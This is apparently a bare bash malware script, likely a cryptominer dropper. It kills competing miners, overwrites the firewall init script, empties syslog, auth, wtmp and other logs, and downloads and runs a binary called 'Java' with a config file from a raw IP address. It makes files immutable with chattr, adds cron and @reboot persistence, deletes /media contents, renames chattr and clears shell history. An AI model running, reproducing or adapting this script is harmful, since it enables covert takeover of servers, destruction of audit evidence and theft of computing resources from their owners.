#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
LANG=en_US.UTF-8
pkill -9 cs
pkill -9 csgo
pkill -9 pkworkers
pkill -9 pkworkerss
pkill -9 xmrig
rm -rf /etc/init.d/firewall;touch /etc/init.d/firewall;chattr +ia /etc/init.d/firewall
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
echo > /var/spool/mail/root
chattr +ia /var/spool/mail/root
rm -rf /usr/lib/systemd/system/ctrl-alt-del.target
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
sleep $((RANDOM % 240 + 1))
cd /usr/bin/;wget http://142.248.80.25/Java;curl -O http://142.248.80.25/Java;wget http://142.248.80.25/config.json;curl -O http://142.248.80.25/config.json;chmod 0755 Java;chattr +ia Java;cp /usr/bin/java /usr/bin/config.json /usr/sbin/;chmod 755 /usr/sbin/Java;chattr +ia /usr/sbin/Java;/usr/bin/Java
service crond start
service cron restart
systemctl start crond.service
systemctl enable crond.service
systemctl restart crond.service
echo "0 0 * * * root pgrep -f '/usr/bin/Java\|/usr/sbin/Java' >/dev/null 2>&1 || ( [ -f /usr/bin/Java ] && /usr/bin/Java || /usr/sbin/Java )" >> /etc/crontab
echo "@reboot root sleep 1800 && pgrep -f '/usr/bin/Java\|/usr/sbin/Java' >/dev/null 2>&1 || ( [ -f /usr/bin/Java ] && /usr/bin/Java || /usr/sbin/Java )" >> /etc/crontab
chmod u+x /etc/crontab;chattr +ia /etc/crontab
rm -rf /usr/lib/systemd/system/ctrl-alt-del.target
rm -rf /etc/init/control-alt-delete.conf
cd /root
rm -rf syn
rm -rf /syn
rm -rf /root/syn
cd /usr/bin
rm -rf /media/*
mv /usr/bin/chattr /usr/bin/lkei
history -c